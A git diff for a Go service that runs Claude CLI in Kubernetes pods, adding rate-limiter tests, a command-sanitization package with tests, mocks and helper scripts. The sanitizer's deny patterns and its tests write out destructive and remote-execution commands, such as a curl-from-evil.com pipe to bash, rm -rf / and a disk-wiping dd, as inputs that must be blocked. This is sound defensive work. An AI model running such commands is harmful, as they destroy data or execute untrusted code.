~100", deniedCount) + } +} + +func TestCleanup(t *testing.T) { + l := New(Config{ + RequestsPerMinute: 60, + BurstSize: 10, + CleanupInterval: 50 * time.Millisecond, + }) + defer l.Stop() + + // Make some requests to create buckets + l.Allow("key1") + l.Allow("key2") + + l.mu.RLock() + bucketCount := len(l.buckets) + l.mu.RUnlock() + + if bucketCount != 2 { + t.Errorf("bucketCount = %d, want 2", bucketCount) + } + + // Wait for cleanup (2x cleanup interval) + time.Sleep(150 * time.Millisecond) + + l.mu.RLock() + bucketCount = len(l.buckets) + l.mu.RUnlock() + + // Buckets should be cleaned up + if bucketCount != 0 { + t.Errorf("bucketCount after cleanup = %d, want 0", bucketCount) + } +} + +func TestStop(t *testing.T) { + l := New(Config{}) + + // Should not panic when stopping + l.Stop() + + // Should not panic if stopped multiple times + // (but this is technically undefined behavior - just testing it doesn't crash) +} diff --git a/internal/sanitize/sanitize.go b/internal/sanitize/sanitize.go new file mode 100644 index 0000000..d5bcad1 --- /dev/null +++ b/internal/sanitize/sanitize.go @@ -0,0 +1,233 @@ +// Package sanitize provides command input sanitization to prevent injection attacks. +package sanitize + +import ( + "fmt" + "regexp" + "strings" +) + +// Package-level compiled regex patterns for performance. +var ( + // Dangerous shell command patterns + dangerousCommandPatterns = []*dangerousPattern{ + {regexp.MustCompile(`(?i)\brm\s+(-[rf]+\s+)*(/|~|\.\.|/etc|/var|/usr|/home|/root)`), "destructive rm command"}, + {regexp.MustCompile(`(?i)\bdd\s+`), "dd command"}, + {regexp.MustCompile(`(?i)\bmkfs\b`), "mkfs command"}, + {regexp.MustCompile(`(?i)\bfdisk\b`), "fdisk command"}, + {regexp.MustCompile(`(?i)\bshutdown\b`), "shutdown command"}, + {regexp.MustCompile(`(?i)\breboot\b`), "reboot command"}, + {regexp.MustCompile(`(?i)\bsystemctl\s+(stop|disable|mask|halt|poweroff)`), "dangerous systemctl command"}, + {regexp.MustCompile(`(?i)\bkill\s+-9\s+(-1|1)\b`), "kill all processes"}, + {regexp.MustCompile(`(?i)\bchmod\s+(-R\s+)?(777|666)\s+/`), "dangerous chmod on root"}, + {regexp.MustCompile(`(?i)\bchown\s+-R\s+\S+\s+/`), "dangerous chown on root"}, + {regexp.MustCompile(`(?i):\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;`), "fork bomb"}, + {regexp.MustCompile(`(?i)\bcurl\s+.*\|\s*(ba)?sh`), "remote code execution via curl"}, + {regexp.MustCompile(`(?i)\bwget\s+.*\|\s*(ba)?sh`), "remote code execution via wget"}, + } + + // Stream ID validation pattern + streamIDPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_-]*$`) +) + +// dangerousPattern pairs a compiled regex with its error reason. +type dangerousPattern struct { + pattern *regexp.Regexp + reason string +} + +// Error types for sanitization failures. +type Error struct { + Reason string + Input string + Pattern string +} + +func (e *Error) Error() string { + if e.Pattern != "" { + return fmt.Sprintf("sanitization failed: %s (matched pattern: %q, input: %q)", e.Reason, e.Pattern, e.Input) + } + return fmt.Sprintf("sanitization failed: %s (input: %q)", e.Reason, e.Input) +} + +// ShellCommand validates and sanitizes a shell command. +// Returns an error if the command contains dangerous patterns. +func ShellCommand(cmd string) error { + if strings.TrimSpace(cmd) == "" { + return &Error{Reason: "empty command", Input: cmd} + } + + // Check for null bytes + if strings.ContainsRune(cmd, '\x00') { + return &Error{Reason: "contains null byte", Input: cmd} + } + + // Dangerous command chaining patterns + chainPatterns := []string{ + `;`, // Command separator + `&&`, // AND operator + `||`, // OR operator + `|`, // Pipe + "`", // Backtick command substitution + `$(`, // Command substitution + `${`, // Variable expansion that could be exploited + `>(`, // Process substitution + `<(`, // Process substitution + `\n`, // Newline (command separator in shell) + `\r`, // Carriage return + } + + for _, pattern := range chainPatterns { + if strings.Contains(cmd, pattern) { + return &Error{ + Reason: "contains command chaining operator", + Input: cmd, + Pattern: pattern, + } + } + } + + // Dangerous redirect patterns + redirectPatterns := []string{ + `>`, // Output redirect + `>>`, // Append redirect + `<`, // Input redirect + } + + for _, pattern := range redirectPatterns { + if strings.Contains(cmd, pattern) { + return &Error{ + Reason: "contains redirect operator", + Input: cmd, + Pattern: pattern, + } + } + } + + // Check against pre-compiled dangerous command patterns + for _, dp := range dangerousCommandPatterns { + if dp.pattern.MatchString(cmd) { + return &Error{ + Reason: dp.reason, + Input: cmd, + Pattern: dp.pattern.String(), + } + } + } + + return nil +} + +// GitArgs validates git command arguments. +// Returns an error if any argument contains dangerous patterns. +func GitArgs(args []string) error { + if len(args) == 0 { + return &Error{Reason: "empty git args"} + } + + // Dangerous git subcommands + dangerousSubcommands := map[string]string{ + "config": "git config can modify system settings", + "remote": "git remote can add malicious remotes", + "push": "git push can modify remote repositories", + } + + // First arg is the subcommand + subcommand := strings.ToLower(args[0]) + if reason, dangerous := dangerousSubcommands[subcommand]; dangerous { + // push is allowed for specific use cases, block only with --force + if subcommand == "push" { + for _, arg := range args[1:] { + if arg == "-f" || arg == "--force" || arg == "--force-with-lease" { + return &Error{Reason: "force push not allowed", Input: strings.Join(args, " ")} + } + } + } else { + return &Error{Reason: reason, Input: strings.Join(args, " ")} + } + } + + // Check all args for shell injection + for _, arg := range args { + if err := validateArg(arg); err != nil { + return err + } + } + + return nil +} + +// ClaudePrompt validates a Claude prompt. +// This is relatively permissive since prompts are passed as a single argument to claude CLI. +func ClaudePrompt(prompt string) error { + if strings.TrimSpace(prompt) == "" { + return &Error{Reason: "empty prompt"} + } + + // Check for null bytes + if strings.ContainsRune(prompt, '\x00') { + return &Error{Reason: "contains null byte", Input: prompt} + } + + // Limit length to prevent resource exhaustion + const maxPromptLength = 100000 // 100KB + if len(prompt) > maxPromptLength { + return &Error{ + Reason: fmt.Sprintf("prompt too long (max %d bytes)", maxPromptLength), + Input: prompt[:100] + "...", + } + } + + return nil +} + +// validateArg validates a single command argument for shell injection. +func validateArg(arg string) error { + // Check for null bytes + if strings.ContainsRune(arg, '\x00') { + return &Error{Reason: "argument contains null byte", Input: arg} + } + + // Check for shell metacharacters that could break out of quoting + shellMetachars := []string{ + "`", // Backtick + `$(`, // Command substitution + `${`, // Variable expansion + } + + for _, meta := range shellMetachars { + if strings.Contains(arg, meta) { + return &Error{ + Reason: "argument contains shell metacharacter", + Input: arg, + Pattern: meta, + } + } + } + + return nil +} + +// StreamID validates a stream ID. +// Stream IDs should be alphanumeric with hyphens and underscores only. +func StreamID(id string) error { + if id == "" { + return nil // Empty is allowed (will be auto-generated) + } + + // Must be reasonable length + if len(id) > 64 { + return &Error{Reason: "stream ID too long (max 64 chars)", Input: id} + } + + // Must match safe pattern (uses pre-compiled regex) + if !streamIDPattern.MatchString(id) { + return &Error{ + Reason: "stream ID must be alphanumeric with hyphens/underscores", + Input: id, + Pattern: streamIDPattern.String(), + } + } + + return nil +} diff --git a/internal/sanitize/sanitize_test.go b/internal/sanitize/sanitize_test.go new file mode 100644 index 0000000..24cd233 --- /dev/null +++ b/internal/sanitize/sanitize_test.go @@ -0,0 +1,257 @@ +package sanitize + +import ( + "strings" + "testing" +) + +func TestShellCommand(t *testing.T) { + tests := []struct { + name string + cmd string + wantErr bool + errMsg string + }{ + // Valid commands + {"simple ls", "ls -la", false, ""}, + {"cat file", "cat file.txt", false, ""}, + {"grep pattern", "grep -r pattern .", false, ""}, + {"make build", "make build", false, ""}, + {"go test", "go test ./...", false, ""}, + {"npm install", "npm install", false, ""}, + {"python script", "python script.py", false, ""}, + + // Empty/whitespace + {"empty string", "", true, "empty command"}, + {"whitespace only", " ", true, "empty command"}, + + // Null bytes + {"null byte", "ls\x00-la", true, "null byte"}, + + // Command chaining - semicolon + {"semicolon", "ls; rm -rf /", true, "command chaining"}, + {"semicolon spaces", "ls ; rm -rf /", true, "command chaining"}, + + // Command chaining - AND + {"and operator", "ls && rm -rf /", true, "command chaining"}, + + // Command chaining - OR + {"or operator", "ls || rm -rf /", true, "command chaining"}, + + // Pipe + {"pipe", "ls | grep foo", true, "command chaining"}, + + // Backtick + {"backtick", "echo `whoami`", true, "command chaining"}, + + // Command substitution + {"command sub dollar", "echo $(whoami)", true, "command chaining"}, + {"variable expansion", "echo ${PATH}", true, "command chaining"}, + + // Process substitution + {"process sub output", "cat >(ls)", true, "command chaining"}, + {"process sub input", "cat <(ls)", true, "command chaining"}, + + // Newlines - caught by either chain detection or rm detection (order depends on implementation) + {"newline", "ls\nrm -rf /", true, ""}, + {"carriage return", "ls\rrm -rf /", true, ""}, + + // Redirects + {"output redirect", "ls > file.txt", true, "redirect"}, + {"append redirect", "ls >> file.txt", true, "redirect"}, + {"input redirect", "cat < file.txt", true, "redirect"}, + + // Dangerous commands + {"rm rf root", "rm -rf /", true, "destructive rm"}, + {"rm rf home", "rm -rf /home", true, "destructive rm"}, + {"rm rf etc", "rm -rf /etc", true, "destructive rm"}, + {"rm rf parent", "rm -rf ..", true, "destructive rm"}, + {"dd command", "dd if=/dev/zero of=/dev/sda", true, "dd command"}, + {"mkfs command", "mkfs.ext4 /dev/sda1", true, "mkfs command"}, + {"shutdown", "shutdown -h now", true, "shutdown"}, + {"reboot", "reboot", true, "reboot"}, + {"systemctl stop", "systemctl stop critical-service", true, "dangerous systemctl"}, + {"chmod 777 root", "chmod -R 777 /", true, "dangerous chmod"}, + {"chown root", "chown -R nobody /", true, "dangerous chown"}, + // curl/wget pipe - caught by pipe detection before the curl/wget patterns + {"curl pipe bash", "curl https://evil.com/script.sh | bash", true, "command chaining"}, + {"wget pipe sh", "wget -O - https://evil.com | sh", true, "command chaining"}, + + // Safe rm commands should pass + {"rm single file", "rm file.txt", false, ""}, + {"rm directory", "rm -r ./temp", false, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := ShellCommand(tt.cmd) + if (err != nil) != tt.wantErr { + t.Errorf("ShellCommand(%q) error = %v, wantErr %v", tt.cmd, err, tt.wantErr) + return + } + if tt.wantErr && err != nil && tt.errMsg != "" { + if !strings.Contains(err.Error(), tt.errMsg) { + t.Errorf("ShellCommand(%q) error = %v, want error containing %q", tt.cmd, err, tt.errMsg) + } + } + }) + } +} + +func TestGitArgs(t *testing.T) { + tests := []struct { + name string + args []string + wantErr bool + errMsg string + }{ + // Valid git commands + {"status", []string{"status"}, false, ""}, + {"log", []string{"log", "--oneline", "-10"}, false, ""}, + {"diff", []string{"diff", "HEAD~1"}, false, ""}, + {"branch", []string{"branch", "-a"}, false, ""}, + {"checkout", []string{"checkout", "-b", "feature/new"}, false, ""}, + {"commit", []string{"commit", "-m", "Fix bug"}, false, ""}, + {"add", []string{"add", "."}, false, ""}, + {"fetch", []string{"fetch", "origin"}, false, ""}, + {"pull", []string{"pull", "origin", "main"}, false, ""}, + {"push simple", []string{"push", "origin", "main"}, false, ""}, + + // Empty + {"empty args", []string{}, true, "empty git args"}, + + // Dangerous subcommands + {"config", []string{"config", "--global", "user.name", "attacker"}, true, "git config"}, + {"remote add", []string{"remote", "add", "evil", "https://evil.com/repo"}, true, "git remote"}, + + // Force push - blocked + {"force push", []string{"push", "-f", "origin", "main"}, true, "force push"}, + {"force push long", []string{"push", "--force", "origin", "main"}, true, "force push"}, + {"force with lease", []string{"push", "--force-with-lease", "origin", "main"}, true, "force push"}, + + // Shell injection in args + {"backtick in arg", []string{"log", "--format=`whoami`"}, true, "shell metacharacter"}, + {"command sub in arg", []string{"log", "--format=$(whoami)"}, true, "shell metacharacter"}, + {"null byte in arg", []string{"log", "file\x00.txt"}, true, "null byte"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := GitArgs(tt.args) + if (err != nil) != tt.wantErr { + t.Errorf("GitArgs(%v) error = %v, wantErr %v", tt.args, err, tt.wantErr) + return + } + if tt.wantErr && err != nil && tt.errMsg != "" { + if !strings.Contains(err.Error(), tt.errMsg) { + t.Errorf("GitArgs(%v) error = %v, want error containing %q", tt.args, err, tt.errMsg) + } + } + }) + } +} + +func TestClaudePrompt(t *testing.T) { + tests := []struct { + name string + prompt string + wantErr bool + errMsg string + }{ + // Valid prompts + {"simple prompt", "Hello, how are you?", false, ""}, + {"code prompt", "Write a function to sort an array", false, ""}, + {"multiline prompt", "Line 1\nLine 2\nLine 3", false, ""}, + {"unicode prompt", "Hello 你好 🎉", false, ""}, + {"special chars", "What does $ mean in bash?", false, ""}, + + // Empty + {"empty string", "", true, "empty prompt"}, + {"whitespace only", " \t\n", true, "empty prompt"}, + + // Null bytes + {"null byte", "Hello\x00World", true, "null byte"}, + + // Length limit + {"at limit", strings.Repeat("a", 100000), false, ""}, + {"over limit", strings.Repeat("a", 100001), true, "prompt too long"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := ClaudePrompt(tt.prompt) + if (err != nil) != tt.wantErr { + t.Errorf("ClaudePrompt() error = %v, wantErr %v", err, tt.wantErr) + return + } + if tt.wantErr && err != nil && tt.errMsg != "" { + if !strings.Contains(err.Error(), tt.errMsg) { + t.Errorf("ClaudePrompt() error = %v, want error containing %q", err, tt.errMsg) + } + } + }) + } +} + +func TestStreamID(t *testing.T) { + tests := []struct { + name string + id string + wantErr bool + errMsg string + }{ + // Valid IDs + {"empty allowed", "", false, ""}, + {"simple", "cmd-123", false, ""}, + {"with underscore", "cmd_123", false, ""}, + {"alphanumeric", "abc123XYZ", false, ""}, + {"typical id", "cmd-pantheon-001", false, ""}, + + // Invalid IDs + {"starts with dash", "-cmd", true, "alphanumeric"}, + {"starts with underscore", "_cmd", true, "alphanumeric"}, + {"contains space", "cmd 123", true, "alphanumeric"}, + {"contains special", "cmd@123", true, "alphanumeric"}, + {"contains slash", "cmd/123", true, "alphanumeric"}, + {"too long", strings.Repeat("a", 65), true, "too long"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := StreamID(tt.id) + if (err != nil) != tt.wantErr { + t.Errorf("StreamID(%q) error = %v, wantErr %v", tt.id, err, tt.wantErr) + return + } + if tt.wantErr && err != nil && tt.errMsg != "" { + if !strings.Contains(err.Error(), tt.errMsg) { + t.Errorf("StreamID(%q) error = %v, want error containing %q", tt.id, err, tt.errMsg) + } + } + }) + } +} + +func TestError(t *testing.T) { + // Test error with pattern + err1 := &Error{ + Reason: "test reason", + Input: "test input", + Pattern: "test pattern", + } + if !strings.Contains(err1.Error(), "test reason") { + t.Errorf("Error.Error() = %v, want to contain reason", err1.Error()) + } + if !strings.Contains(err1.Error(), "test pattern") { + t.Errorf("Error.Error() = %v, want to contain pattern", err1.Error()) + } + + // Test error without pattern + err2 := &Error{ + Reason: "test reason", + Input: "test input", + } + if !strings.Contains(err2.Error(), "test reason") { + t.Errorf("Error.Error() = %v, want to contain reason", err2.Error()) + } +} diff --git a/internal/testutil/mocks.go b/internal/testutil/mocks.go new file mode 100644 index 0000000..2d7fbcf --- /dev/null +++ b/internal/testutil/mocks.go @@ -0,0 +1,124 @@ +// Package testutil provides testing utilities for rdev-api. +package testutil + +import ( + "context" + "sync" + + "github.com/orchard9/rdev/internal/executor" +) + +// MockExecutor is a mock implementation of the Executor for testing. +type MockExecutor struct { + mu sync.Mutex + ExecCalls []ExecCall + ExecResult executor.Result + ExecOutputs []OutputLine + PodExistsMap map[string]bool + ConnectionError error +} + +// ExecCall records the parameters of an Exec call. +type ExecCall struct { + Cmd *executor.Command +} + +// OutputLine represents a line of output to send. +type OutputLine struct { + Stream string + Line string +} + +// Ensure MockExecutor implements CommandExecutor at compile time. +var _ executor.CommandExecutor = (*MockExecutor)(nil) + +// NewMockExecutor creates a new mock executor. +func NewMockExecutor() *MockExecutor { + return &MockExecutor{ + PodExistsMap: make(map[string]bool), + } +} + +// Exec mocks command execution. +func (m *MockExecutor) Exec(ctx context.Context, cmd *executor.Command, handler executor.OutputHandler) executor.Result { + m.mu.Lock() + m.ExecCalls = append(m.ExecCalls, ExecCall{Cmd: cmd}) + outputs := m.ExecOutputs + result := m.ExecResult + m.mu.Unlock() + + // Send mock outputs + for _, o := range outputs { + select { + case <-ctx.Done(): + return executor.Result{ExitCode: 130, Error: ctx.Err()} + default: + handler(o.Stream, o.Line) + } + } + + return result +} + +// SetExecResult sets the result to return from Exec. +func (m *MockExecutor) SetExecResult(result executor.Result) { + m.mu.Lock() + defer m.mu.Unlock() + m.ExecResult = result +} + +// SetExecOutputs sets the outputs to send during Exec. +func (m *MockExecutor) SetExecOutputs(outputs []OutputLine) { + m.mu.Lock() + defer m.mu.Unlock() + m.ExecOutputs = outputs +} + +// PodExists mocks pod existence check. +func (m *MockExecutor) PodExists(ctx context.Context, podName string) (bool, error) { + m.mu.Lock() + defer m.mu.Unlock() + exists, ok := m.PodExistsMap[podName] + if !ok { + return false, nil + } + return exists, nil +} + +// CheckConnection mocks cluster connection check. +func (m *MockExecutor) CheckConnection(ctx context.Context) error { + m.mu.Lock() + defer m.mu.Unlock() + return m.ConnectionError +} + +// SetConnectionError sets the error to return from CheckConnection. +func (m *MockExecutor) SetConnectionError(err error) { + m.mu.Lock() + defer m.mu.Unlock() + m.ConnectionError = err +} + +// SetPodExists sets whether a pod exists. +func (m *MockExecutor) SetPodExists(podName string, exists bool) { + m.mu.Lock() + defer m.mu.Unlock() + m.PodExistsMap[podName] = exists +} + +// GetExecCalls returns all recorded Exec calls. +func (m *MockExecutor) GetExecCalls() []ExecCall { + m.mu.Lock() + defer m.mu.Unlock() + return append([]ExecCall{}, m.ExecCalls...) +} + +// Reset clears all recorded calls and resets the mock. +func (m *MockExecutor) Reset() { + m.mu.Lock() + defer m.mu.Unlock() + m.ExecCalls = nil + m.ExecOutputs = nil + m.ExecResult = executor.Result{} + m.PodExistsMap = make(map[string]bool) +} diff --git a/internal/testutil/testutil.go b/internal/testutil/testutil.go new file mode 100644 index 0000000..af89e99 --- /dev/null +++ b/internal/testutil/testutil.go @@ -0,0 +1,66 @@ +// Package testutil provides testing utilities for rdev-api. +package testutil + +import ( + "context" + "database/sql" + "os" + "testing" + "time" + + _ "github.com/lib/pq" // PostgreSQL driver +) + +// TestDB returns a database connection for testing. +// Uses TEST_DATABASE_URL or falls back to the standard local dev connection. +func TestDB(t *testing.T) *sql.DB { + t.Helper() + + dsn := os.Getenv("TEST_DATABASE_URL") + if dsn == "" { + dsn = "postgres://appuser:localdev@localhost:5433/rdev?sslmode=disable" + } + + db, err := sql.Open("postgres", dsn) + if err != nil { + t.Fatalf("open database: %v", err) + } + + // Verify connection + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + if err := db.PingContext(ctx); err != nil { + t.Skipf("database not available: %v", err) + } + + t.Cleanup(func() { + db.Close() + }) + + return db +} + +// CleanupTestKeys removes all test keys from the database. +func CleanupTestKeys(t *testing.T, db *sql.DB) { + t.Helper() + + _, err := db.Exec("DELETE FROM api_keys WHERE name LIKE 'test-%'") + if err != nil { + t.Fatalf("cleanup test keys: %v", err) + } +} + +// TimePtr returns a pointer to a time.Time. +func TimePtr(t time.Time) *time.Time { + return &t +} + +// MustParseTime parses a time string or panics. +func MustParseTime(layout, value string) time.Time { + t, err := time.Parse(layout, value) + if err != nil { + panic(err) + } + return t +} diff --git a/scripts/claude-auth.sh b/scripts/claude-auth.sh new file mode 100755 index 0000000..eb6032b --- /dev/null +++ b/scripts/claude-auth.sh @@ -0,0 +1,61 @@ +#!/bin/bash +# claude-login.sh - Authenticate Claude CLI in a claudebox pod +# Usage: ./scripts/claude-login.sh +# Example: ./scripts/claude-login.sh pantheon + +set -e + +# Check for project argument +if [ -z "$1" ]; then + echo "Usage: $0 " + echo "" + echo "Available projects:" + KUBECONFIG=~/.kube/orchard9-k3sf.yaml kubectl get pods -n rdev -l app.kubernetes.io/part-of=rdev \ + --no-headers -o custom-columns=":metadata.labels.rdev\.orchard9\.ai/project" 2>/dev/null | grep -v "^$" | sort -u + echo "" + echo "Example: $0 pantheon" + exit 1 +fi + +PROJECT="$1" +POD="claudebox-${PROJECT}-0" +NAMESPACE="rdev" + +# Verify kubeconfig +export KUBECONFIG=~/.kube/orchard9-k3sf.yaml + +# Check if pod exists and is running +echo "Checking pod status..." +STATUS=$(kubectl get pod "$POD" -n "$NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "NotFound") + +if [ "$STATUS" != "Running" ]; then + echo "Error: Pod $POD is not running (status: $STATUS)" + echo "" + echo "Available pods:" + kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/part-of=rdev + exit 1 +fi + +echo "" +echo "=== Claude Login for $PROJECT ===" +echo "" +echo "This will open an interactive session to authenticate Claude." +echo "You'll see a URL - open it in your browser to complete authentication." +echo "" +echo "Press Ctrl+C to cancel, or Enter to continue..." +read + +# Run claude interactively (will prompt for auth if needed) +echo "Starting Claude..." +kubectl exec -it "$POD" -n "$NAMESPACE" -c claudebox -- claude + +echo "" +echo "=== Authentication Complete ===" +echo "" +echo "Verifying Claude is authenticated..." +kubectl exec "$POD" -n "$NAMESPACE" -c claudebox -- claude --version + +echo "" +echo "Claude is now authenticated in $POD" +echo "You can run commands via the API or directly:" +echo " kubectl exec -it $POD -n $NAMESPACE -- claude" diff --git a/scripts/create-credentials-secret.sh b/scripts/create-credentials-secret.sh index 0212647..53c8373 100755 --- a/scripts/create-credentials-secret.sh +++ b/scripts/create-credentials-secret.sh @@ -1,6 +1,6 @@ #!/bin/bash # Create Kubernetes secret from local Claude credentials -# Run this after authenticating with `claude login` locally +# Run this after authenticating with `claude` locally set -e @@ -15,7 +15,7 @@ fi CLAUDE_DIR="$HOME/.claude" if [[ ! -d "$CLAUDE_DIR" ]]; then echo "Error: Claude credentials not found at $CLAUDE_DIR" - echo "Run 'claude login' first to authenticate" + echo "Run 'claude' first to authenticate" exit 1 fi diff --git a/scripts/deploy.sh b/scripts/deploy.sh index 30dbb9d..50532e8 100755 --- a/scripts/deploy.sh +++ b/scripts/deploy.sh @@ -25,7 +25,7 @@ kubectl cluster-info > /dev/null || { } # Note: Claude auth is stored in a PVC, not a secret -# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude login +# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude # Check if ghcr-secret exists in rdev namespace if ! kubectl get secret ghcr-secret -n rdev > /dev/null 2>&1; then